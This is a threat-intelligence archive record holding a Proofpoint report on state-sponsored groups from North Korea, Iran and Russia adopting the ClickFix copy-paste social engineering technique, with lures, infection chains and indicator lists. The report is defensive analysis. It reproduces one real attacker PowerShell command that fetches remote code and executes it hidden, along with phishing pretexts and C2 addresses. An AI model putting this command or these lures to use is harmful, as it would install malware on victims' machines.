{ "id": "bdf3ff3c-1a4a-469d-bcdb-1f9efa4e1056", "created_at": "2026-04-06T00:07:40.344901Z", "updated_at": "2026-04-10T03:37:49.997669Z", "deleted_at": null, "sha1_hash": "ce1c9aed40cb251890cac05f24f7bff10ee03d94", "title": "Around the World in 90 Days: State-Sponsored Actors Try ClickFix | Proofpoint US", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2875130, "plain_text": "Around the World in 90 Days: State-Sponsored Actors Try ClickFix |\r\nProofpoint US\r\nPublished: 2025-04-16 · Archived: 2026-04-05 14:44:22 UTC\r\nApril 17, 2025 Saher Naumaan, Mark Kelly, Greg Lesnewich, Josh Miller, and The Proofpoint Threat Research Team\r\nKey Findings\r\nWhile primarily a technique affiliated with cybercriminal actors, Proofpoint researchers discovered state-sponsored\r\nactors in multiple campaigns using the ClickFix social engineering technique for the first time.\r\nOver only a three-month period from late 2024 through the beginning of 2025, groups from North Korea, Iran, and\r\nRussia were all seen using the ClickFix technique in their routine activity.\r\nThe incorporation of ClickFix is not revolutionizing the campaigns carried out by TA427, TA450,\r\nUNK_RemoteRogue, and TA422 but instead is replacing the installation and execution stages in existing infection\r\nchains.\r\nWhile currently limited to a few state-sponsored groups, the increasing popularity of ClickFix in cybercrime over the\r\nlast year as well as in espionage campaigns in recent months suggests the technique will likely become more widely\r\ntested or adopted by state-sponsored actors.\r\nOverview\r\nA major trend in the threat landscape is the fluidity of tactics, techniques, and procedures (TTPs). Threat actors share, copy,\r\nsteal, adopt, and test TTPs from publicly exposed tradecraft or interaction with other threat groups. Specifically, state-sponsored actors have often leveraged techniques first developed and deployed by cybercriminal actors. For example, North\r\nKorean threat actors copying techniques from cybercrime to steal cryptocurrency on behalf of the government, or Chinese\r\ngroups mimicking cybercrime infection chains to deliver malware in espionage operations.\r\nThe most recent example of this trend is ClickFix. ClickFix is a social engineering technique that uses dialogue boxes with\r\ninstructions to copy, paste, and run malicious commands on the target’s machine. This creative technique not only employs\r\nfake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating\r\nsystem as a solution. Primarily observed in cybercrime activity, the ClickFix technique was first seen in early March 2024\r\ndeployed by initial access broker TA571 and the ClearFake cluster, after which it flooded the threat landscape.\r\nOne year later, at least four state-sponsored threat actors have since experimented with variations of this technique as part of\r\ntheir business-as-usual espionage campaigns. Over roughly a three-month period from October 2024 to January 2025, threat\r\nactors originating from three distinct countries (North Korea, Iran, and Russia) incorporated ClickFix as a stage in their\r\ninfection chains.\r\nNorth Korea: TA427\r\nIn January and February 2025, Proofpoint first observed TA427 operators targeting individuals in fewer than five\r\norganizations in the think tank sector with a new infection chain using the ClickFix technique. TA427 overlaps with activity\r\nthird parties refer to as Kimsuky or Emerald Sleet.\r\nTA427 made initial contact with the target through a meeting request from a spoofed sender delivered to traditional TA427\r\ntargets working on North Korean affairs. After a brief conversation to engage the target and build trust, as is often seen in\r\nTA427 activity, the attackers directed the target to an attacker-controlled site where they convinced the target to run a\r\nPowerShell command. While one chain failed to retrieve further payloads, another instance of this campaign included a\r\nmultistage chain that executed PowerShell, VBS, and batch scripts, which eventually led to a final payload – QuasarRAT, a\r\ncommodity malware also seen in cybercriminal activity.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 1 of 18\n\nAn overview of the infection chain is shown in the graphic below.\r\nTA427 ClickFix infection chains (chain 1 - solid line; chain 2 – dotted line).\r\nDelivery\r\nIn February 2025, TA427 operators masqueraded as a Japanese diplomat and sent an email to the target asking to arrange a\r\nmeeting with Ambassador Shigeo Yamada, the Japanese ambassador to the US, at the embassy in Washington, DC. \r\nInitial TA427 conversation starter with benign attachment.\r\nThe email contained a benign attachment with the filename “Letter from Ambassador Cho Hyun-Dong.pdf” and the subject\r\nline “[Japanese Embassy] Meeting Request”. Further engagement involved communication with both the target’s personal\r\nand professional email accounts and prompted the attackers to follow up with a malicious email.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 2 of 18\n\nTA427 reply with malicious attachment.\r\nThe email response from the attackers contained a PDF attachment that used the target's name in the title, and the PDF\r\nincluded a link to a landing page using a subdomain of a dynamic DNS domain claiming to be a secure drive.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 3 of 18\n\nPDF attachment lure containing malicious link.\r\nThe landing page hosted a fake PDF file called Questionnaire.pdf.\r\nLanding page hosting fake PDF.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 4 of 18\n\nIf the target attempted to download the fake PDF, they would be redirected to another page. A pop-up alert told the user to\r\nregister to see the documents.\r\n“Register” dialogue box.\r\nWhen the user clicked the register button, another pop-up appeared prompting the user to enter a code along with\r\ninstructions on how to register, as shown below.\r\nDialogue box with code and instructions to run PowerShell commands.\r\nThe user must manually copy and paste the register code containing the PowerShell command and run it in terminal, as\r\nshown below.\r\n powershell -windowstyle hidden -Command iwr\r\n \"hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd\" -OutFile\r\n \"$env:TEMP\\p\"; $c=Get-Content -Path \"$env:TEMP\\p\" -Raw; iex\r\n $c;\r\n 3Z5TY-76FR3-9G87H-7ZC56\r\nThe ClickFix PowerShell command fetches and executes a second remotely hosted PowerShell command, which displayed\r\nthe decoy PDF referenced earlier in the chain (Questionnaire.pdf) to the user, as shown below. The document claimed to be\r\nfrom the Ministry of Foreign Affairs in Japan and contained questions regarding nuclear proliferation and policy in\r\nNortheast Asia.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 5 of 18\n\nDecoy lure Questionnaire.pdf.\r\nThe second PowerShell script created a VBS script called temp.vbs that is run every 19 minutes by a scheduled task called\r\nUpdate-out-of-date-20240324001883765674. A second scheduled task called Update-out-of-date-20240324001883765675\r\nwas also created to run a VBS script every 20 minutes; however, this VBS script did not exist, and the purpose of this task is\r\nunclear.\r\nWhile this chain did not execute further past running a scheduled task, another chain seen in January 2025 followed a very\r\nsimilar path but with additional steps. In this case, the first scheduled task ultimately downloaded two batch scripts, which\r\ncreated and decoded two new PowerShell scripts and an obfuscated payload.\r\nThe second batch script executed the newly created PowerShell scripts to ultimately decode a Base64 and XOR-encoded\r\nQuasarRAT payload that communicated with the command and control (C2) IP address 38.180.157[.]197 over port 80.\r\nWhile TA427 has adopted new techniques in its infection chain, the group has been using QuasarRAT – a publicly available\r\ntool – for at least four years. Proofpoint attributes this activity to TA427 based on infrastructure overlap, TTPs, and malware.\r\nNetwork Infrastructure Analysis\r\nFurther investigation into the delivery infrastructure found several other servers and staging URLs with largely similar\r\nthemes. Proofpoint researchers also observed TA427 use Japanese, Korean, and English-language content in this campaign,\r\ncustomized to align with the spoofed senders. An example of another secure drive spoof in Korean is shown below.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 6 of 18\n\nFake secure drive example from mid-January 2025.\r\nTA427 used Dynamic DNS (DDNS) services for this campaign, primarily hosted on servers located in South Korea that\r\nhave likely been compromised. In all cases the attackers used either the FreeDNS or No-IP DDNS services and spoofed a\r\nsecure drive or account profile as subdomains. All the infrastructure related to this activity was set up no earlier than January\r\n2025.\r\nIn the same month, Microsoft observed a variation of TA427’s ClickFix infection chain, similarly with a URL to register a\r\ndevice and run PowerShell commands. In this variation, the code installed a browser-based remote desktop tool and\r\ndownloaded a certificate and PIN used to register the victim device. It is likely that TA427 made multiple attempts to use the\r\nClickFix technique with different versions over several weeks, before returning to tried-and-tested techniques shortly after.\r\nIran: TA450\r\nOn 13 and 14 November 2024, TA450 used an attacker-controlled email address support@microsoftonlines[.]com to send an\r\nEnglish-language phish to targets in at least 39 organizations in the Middle East. TA450 overlaps with groups third parties\r\nrefer to as MuddyWater and Mango Sandstorm. The email masqueraded as a security update from Microsoft with the subject\r\nline: “Urgent Security Update Required – Immediate Action Needed” to convince individuals to execute a series of steps to\r\naddress a security vulnerability.\r\nThe attackers deployed the ClickFix technique by persuading the target to first run PowerShell with administrator privileges,\r\nthen copy and run a command contained in the email body. The command was responsible for installing remote management\r\nand monitoring (RMM) software – in this case, Level – after which TA450 operators will abuse the RMM tool to conduct\r\nespionage and exfiltrate data from the target’s machine.\r\nThe infection chain can be seen below:\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 7 of 18\n\nTA450 ClickFix infection chain.\r\nOn 15 November, the Israeli National Cyber Directorate reported that the command would load a specific RMM tool called\r\nLevel. While Proofpoint has observed TA450 historically using several RMM tools, such as Atera, PDQ Connect,\r\nScreenConnect, and SimpleHelp as a foothold to conduct intrusions, this was the first sighting of Level in Proofpoint data.\r\nTA450 phish (INCD).\r\nThis attribution is based on known TA450 TTPs, campaign targeting, and malware analysis. However, while typical TA450\r\nRMM campaigns have consistently targeted organizations in Israel, the group’s ClickFix campaign was broader in scope.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 8 of 18\n\nAs shown in the heatmap below, Proofpoint researchers observed TA450 targets distributed primarily across the Middle East\r\nwith an emphasis on the UAE and Saudi Arabia, but with global targets as well.\r\nTA450 ClickFix campaign target heatmap.\r\nThe targets spanned several sectors, but finance and government organizations were among the more popular targets.\r\nTA450 ClickFix target breakdown by sector.\r\nAt the time of writing, no further instances of TA450 using ClickFix have been observed since the initial sighting in\r\nNovember 2024. However, TA450 has remained consistent in its typical targeting of Israel and tactics using RMMs in\r\nsubsequent months.\r\nRussia: UNK_RemoteRogue and TA422\r\nNorth Korean and Iranian state actors aren’t the only ones experimenting with ClickFix. A suspected Russian group tracked\r\nas UNK_RemoteRogue was also seen using it at the end of 2024 in the following infection chain.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 9 of 18\n\nUNK_RemoteRogue ClickFix infection chain.\r\nBeginning on 9 December 2024, a targeted campaign used compromised infrastructure to send 10 messages to individuals in\r\ntwo organizations associated with a major arms manufacturer in the defense industry. The messages did not contain a subject\r\nline and abused various likely compromised Zimbra servers as intermediate sending infrastructure, which then populated the\r\n‘From’ fields. The emails contained a malicious link that spoofed Microsoft Office with the title “RSVP Office -\r\nСтворюйте, редагуйте документи та діліться ними в Інтернеті”:\r\n         hxxps://office[.]rsvp/fin?document=2hg6739jhngdf7892w0p93u4yh5g\r\nThe link description translated to “RSVP Office - Create, edit and share documents online.” If the target visited the link, it\r\ndisplayed HTML that spoofed a Microsoft Word document with ClickFix-style instructions in Russian to copy code from the\r\nbrowser into their terminal. The webpage included a link to a YouTube video tutorial on how to run PowerShell.\r\nUNK_RemoteRogue ClickFix landing page spoofing Microsoft Word.\r\nThe commands pasted in the terminal ran malicious JavaScript that then executed PowerShell code linked to the Empire C2\r\nframework.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 10 of 18\n\nProofpoint observed UNK_RemoteRogue’s use of ClickFix only once, after which the group returned to its traditional\r\ncampaigns, which display many of the same features, including the use of compromised intermediate mailservers, the same\r\nupstream sending host, and highly similar targeting. In January 2025, the domain office[.]rsvp began resolving to\r\n5.231.4[.]94, which was also hosting ukrtelcom[.]com and mail.ukrtelecom[.]eu. These domains were seen in further\r\nUNK_RemoteRogue phishing activity the same month. Research from DomainTools highlighted additional\r\nUNK_RemoteRogue infrastructure.\r\nOn 28 January, UNK_RemoteRogue returned in a campaign that showed the group’s consistent abuse of compromised\r\nmailservers as intermediate senders via 80.66.66[.]197 as the upstream concentrator. The group forged the ‘From’ header in\r\nthe targeted emails to spoof Ukrainian entities as well as telecommunications and defence companies, and the messages\r\ndelivered RDP files. Later campaigns in February 2025 used a password-protected link to facilitate delivery of the RDP\r\nfiles.\r\nUNK_RemoteRogue phishing email with RDP attachment in January 2025.\r\nIf the targets’ hosts allow for remote connections, the downloaded file will create an RDP connection that includes\r\nconnection of all attached drives and redirect clipboard data and web authentication attempts to a remote host. In Proofpoint\r\nThreat Research’s investigation of cloud data, the 80.66.66[.]197 IP was observed attempting to log in to Office 365\r\nExchange accounts of users working in individual US state governments in late February 2025.\r\nAnother sighting of ClickFix came from an established Russian group on 17 October 2024. CERT-UA observed TA422 send\r\nphishing emails containing a link that mimicked a Google spreadsheet. TA422 overlaps with activity third parties call Sofacy\r\nand APT28. This led to a reCAPTCHA prompt, which when clicked, would copy and paste a PowerShell command along\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 11 of 18\n\nwith displaying a further dialogue box with instructions to run the command. The PowerShell creates an SSH tunnel and\r\nruns Metasploit.\r\nConclusion\r\nAs with other criminal – and often creative and novel – techniques, state-sponsored actors observe and emulate other groups\r\n(sometimes with a convenient byproduct of muddling attribution). Multiple examples of state-sponsored actors using\r\nClickFix have shown not only the technique’s popularity among state actors, but also its use by various countries within\r\nweeks of one another.\r\nThe timeline below shows each ClickFix sighting among the typical cadence of state-sponsored actor’s campaigns. In most\r\ncases, the groups returned to standard campaigns after their ClickFix campaigns. TA422 is an exception as no further\r\ncampaigns were observed; however, this is likely due to Proofpoint visibility rather than a lack of subsequent activity. \r\nTimeline of standard campaigns and ClickFix sightings (Jul 2024 – Mar 2025).\r\nWhile several ClickFix sightings were observed, no actor had shown repeated use of the technique in the weeks following. It\r\nis unclear why each actor was only observed with one ClickFix campaign or wave while other typical campaigns continue in\r\nparallel. We initially hypothesized that this may be due to the technique’s early days among state-sponsored actors as they\r\ntrial it, or perhaps the technique did not have as much success as others for machine compromise. However, recent\r\nProofpoint investigations found that as the group continued with its typical campaigns, TA427 returned to ClickFix with a\r\nslightly varied infection chain in April, over two months after the initial sightings. This likely indicates that TA427 is further\r\ndeveloping how it uses the ClickFix technique in its operations, and more sightings are likely in the coming months.\r\nAlthough not a persistently used technique, it is likely that more threat actors from North Korea, Iran, and Russia have also\r\ntried and tested ClickFix or may in the near future. Given the technique’s trajectory around the world, there is a conspicuous\r\nabsence in the use of ClickFix by a Chinese state-sponsored actor in Proofpoint investigations. However, this is likely due to\r\nvisibility, and there is a high probability that a China-nexus group has also experimented with ClickFix, given its appearance\r\nacross many actors’ campaigns in a short period of time.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 12 of 18\n\nIndicators of compromise \r\nCertain PDF hashes have been excluded from the indicator list because they were personalized to the target. \r\nTA427 Network Indicators \r\nIndicator  Type  Description  First Seen \r\nyasuyuki.ebata21@proton[.]me \r\nEmail\r\naddress \r\nSender email \r\nFebruary\r\n2025 \r\neunsoolim29@gmail[.]com \r\nEmail\r\naddress \r\nSender email \r\nJanuary\r\n2025 \r\n115.92.4[.]123  IP \r\nLikely legitimate but\r\ncompromised server \r\nJanuary\r\n2025 \r\n121.179.161[.]230  IP \r\nLikely legitimate but\r\ncompromised server \r\nJanuary\r\n2025 \r\n121.179.161[.]231  IP \r\nLikely legitimate but\r\ncompromised server \r\nJanuary\r\n2025 \r\n172.86.111[.]75  IP \r\nLikely legitimate but\r\ncompromised server \r\nJanuary\r\n2025 \r\n210.179.30[.]213  IP \r\nLikely legitimate but\r\ncompromised server \r\nJanuary\r\n2025 \r\n221.144.93[.]250  IP \r\nLikely legitimate but\r\ncompromised server \r\nJanuary\r\n2025 \r\n118.194.228[.]184  IP \r\nLikely legitimate but\r\ncompromised server \r\nJanuary\r\n2025 \r\n14.34.85[.]86  IP \r\nLikely legitimate but\r\ncompromised server \r\nJanuary\r\n2025 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 13 of 18\n\n38.180.157[.]197  IP  QuasarRAT C2 \r\nJanuary\r\n2025 \r\nsecuredrive.networkguru[.]com  Domain  Payload delivery \r\nJanuary\r\n2025 \r\nsecuredrive.servehttp[.]com  Domain  Payload delivery \r\nJanuary\r\n2025 \r\nsecuredrive-mofa.servehttp[.]com  Domain  Payload delivery \r\nJanuary\r\n2025 \r\nlogin-accounts.servehttp[.]com  Domain  Payload delivery \r\nJanuary\r\n2025 \r\naccounts-myservice.servepics[.]com  Domain  Payload delivery \r\nJanuary\r\n2025 \r\nsecuredrive.netsecgroup[.]com  Domain  Payload delivery \r\nJanuary\r\n2025 \r\nsecuredrive.privatedns[.]org  Domain  Payload delivery \r\nJanuary\r\n2025 \r\ndrive.us-dos.securitel[.]com  Domain  Payload delivery \r\nMarch\r\n2025 \r\nsecuredrive.fin-tech[.]com  Domain  Payload delivery \r\nJanuary\r\n2025 \r\nsecuredrive.opticalize[.]com  Domain  Payload delivery \r\nJanuary\r\n2025 \r\nsecuredrive.dob[.]jp  Domain  Payload delivery \r\nFebruary\r\n2025 \r\naccounts-porfile.serveirc[.]com  Domain  Payload delivery \r\nFebruary\r\n2025 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 14 of 18\n\naccount-profile.servepics[.]com  Domain  Payload delivery \r\nFebruary\r\n2025 \r\nfreedrive.servehttp[.]com  Domain  Payload delivery \r\nMarch\r\n2025 \r\ne-securedrive.mofa.mtomtech.co[.]kr  Domain  Payload delivery  April 2025 \r\nsecuredrive.root[.]sx  Domain  Payload delivery \r\nFebruary\r\n2025 \r\nmyaccounts-profile.servehttp[.]com  Domain  Payload delivery  April 2025 \r\nundocs.myvnc[.]com  Domain  Payload delivery  April 2025 \r\nundocs.servehttp[.]com  Domain  Payload delivery  April 2025 \r\nraedom[.]store  Domain  C2 \r\nJanuary\r\n2025 \r\nhxxps://securedrive.root[.]sx:8443/us.emb-japan.go.jp/doc/eh \r\nURL  Landing page \r\nFebruary\r\n2025 \r\nhxxps://securedrive[.]root[.]sx:8443/us.emb-japan.go.jp/doc/eh/alert \r\nURL  ClickFix pop-up \r\nFebruary\r\n2025 \r\nhxxps://securedrive[.]root[.]sx:8443/us.emb-japan.go.jp/doc/eh/register \r\nURL  ClickFix pop-up \r\nFebruary\r\n2025 \r\nhxxps://securedrive.fin-tech[.]com/docs/en/  URL  Landing page \r\nJanuary\r\n2025 \r\nhxxps://securedrive.fin-tech[.]com/docs/en/alert  URL  ClickFix pop-up \r\nJanuary\r\n2025 \r\nhxxps://securedrive.fin-tech[.]com/docs/en/register  URL  ClickFix pop-up \r\nJanuary\r\n2025 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 15 of 18\n\nhxxps://securedrive.fin-tech[.]com/docs/en/t.vmd  URL \r\nHosting URL for\r\nPowerShell \r\nJanuary\r\n2025 \r\nhxxps://securedrive.fin-tech[.]com/docs/en/src/pdf_0.pdf  URL \r\nHosting URL for decoy\r\nPDF \r\nJanuary\r\n2025 \r\nhxxps://securedrive.fin-tech[.]com/docs/en/src/resp.php  URL  Redirect URL \r\nJanuary\r\n2025 \r\nhxxps://raedom[.]store/[REDACTED]/demo.php?ccs=cin  URL  VBS script C2 \r\nJanuary\r\n2025 \r\nhxxps://bit-albania[.]com/[REDACTED]/demo.php?\r\nccs=cin \r\nURL \r\nVBS script C2\r\n(compromised) \r\nFebruary\r\n2025 \r\nTA427 Malware Indicators \r\nIndicator  Type  Filename  Description \r\nFirst\r\nSeen\r\n06816634fb019b6ed276d36f414f3b36f99b845ddd1015c2b84a34e0b8d7f083  SHA256 \r\nLetter from\r\nAmbassador\r\nCho Hyun-Dong.pdf \r\nLure\r\ndocument \r\nJanua\r\n2025\r\n0ff9c4bba39d6f363b9efdfa6b54127925b8c606ecef83a716a97576e288f6dd  SHA256  temp.vbs \r\nStager\r\nscript \r\nJanua\r\n2025\r\n18ee1393fc2b2c1d56d4d8f94efad583841cdf8766adb95d7f37299692d60d7d  SHA256  temp.vbs \r\nStager\r\nscript \r\nFebru\r\n2025\r\ne410ffadb3f5b6ca82cece8bce4fb378a43c507e3ba127ef669dbb84e3c73e61  SHA256  1.bat  Loader \r\nJanua\r\n2025\r\n78aa2335d3e656256c50f1f2c544b32713790857998068a5fa6dec1fb89aa411  SHA256  2.bat  Loader \r\nJanua\r\n2025\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 16 of 18\n\n07a45c7a436258aa81ed2e770a233350784f5b05538da8a1d51d03c55d9c0875  SHA256  adobe.ps1  Dropper \r\nJanua\r\n2025\r\nf9536b1d798bee3af85b9700684b41da67ff9fed79aae018a47af085f75c9e3e  SHA256  mer.ps1  Dropper \r\nJanua\r\n2025\r\n85db55aab78103f7c2d536ce79e923c5fd9af14a2683f8bf290993828bddeb50  SHA256  Unknown  QuasarRAT \r\nJanua\r\n2025\r\nTA450 Network Indicators \r\nIndicator  Type  Description  First Seen \r\nsupport@microsoftonlines[.]com  Email address  Sender email  November 2024 \r\nmicrosoftonlines[.]com  Domain  Phishing  November 2024 \r\nUNK_RemoteRogue Network Indicators \r\nIndicator  Type  Description  First Seen \r\noffice[.]rsvp  Domain \r\nEmail\r\ndelivery \r\nDecember\r\n2024 \r\nmail.ukrtelecom[.]eu  Domain  Phishing  January 2025 \r\nukrtelecom[.]eu  Domain  Phishing  January 2025 \r\nukrtelecom[.]com  Domain  Phishing  January 2025 \r\nhxxps://office[.]rsvp/fin?\r\ndocument=2hg6739jhngdf7892w0p93u4yh5g \r\nURL  Landing page \r\nDecember\r\n2024 \r\n80.66.66[.]197  IP \r\nEmail\r\ndelivery \r\nDecember\r\n2024 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 17 of 18\n\n5.231.4[.]94  IP  \r\nEmail\r\ndelivery \r\nJanuary 2025 \r\nUNK_RemoteRogue Malware Indicators \r\nIndicator  Type  Description \r\nFirst\r\nSeen \r\nbfb11abb82ab4c788156df862a5cf4fa085f1ac3203df7a46251373d55cc587c  SHA256 \r\nHTML\r\nlanding\r\npage \r\nDecember\r\n2024 \r\n8a8c57eedca1bd03308198a87cae7977d3c385f240c5c62ac7c602126a1a312f  SHA256 \r\nJavaScript\r\nexecutes\r\nPowerShell \r\nDecember\r\n2024 \r\nET Rules \r\n2061585 - ET PHISHING Observed DNS Query to TA450 Domain (microsoftonlines .com) \r\n2061586 - ET PHISHING Observed TA450 Domain in TLS SNI (microsoftonlines .com in TLS SNI) \r\n2061587 - ET PHISHING Observed DNS Query to UNK_RemoteRogue Domain (office .rsvp) \r\n2061588 - ET PHISHING Observed DNS Query to UNK_RemoteRogue Domain (ukrtelecom .com) \r\n2061589 - ET PHISHING Observed DNS Query to UNK_RemoteRogue Domain (ukrtelecom .eu) \r\n2061590 - ET PHISHING Observed UNK_RemoteRogue Domain in TLS SNI (office .rsvp in TLS SNI) \r\n2061591 - ET PHISHING Observed UNK_RemoteRogue Domain in TLS SNI (ukrtelecom .com in TLS SNI) \r\n2061592 - ET PHISHING Observed UNK_RemoteRogue Domain in TLS SNI (ukrtelecom .eu in TLS SNI) \r\n2061593 - ET MALWARE Observed DNS Query to TA427 Domain (raedom .store) \r\n2061594 - ET MALWARE Observed TA427 Domain in TLS SNI (raedom .store in TLS SNI) \r\nSource: https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nhttps://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix" ], "report_names": [ "around-world-90-days-state-sponsored-actors-try-clickfix" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "699cffa0-44cd-4c73-b83f-40dfd99097fc", "created_at": "2025-05-29T02:00:03.215951Z", "updated_at": "2026-04-10T02:00:03.868306Z", "deleted_at": null, "main_name": "UNK_RemoteRogue", "aliases": [], "source_name": "MISPGALAXY:UNK_RemoteRogue", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "7183913d-9a43-4362-96e1-9af522b6ab84", "created_at": "2024-06-19T02:00:04.377344Z", "updated_at": "2026-04-10T02:00:03.653777Z", "deleted_at": null, "main_name": "TA571", "aliases": [], "source_name": "MISPGALAXY:TA571", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": 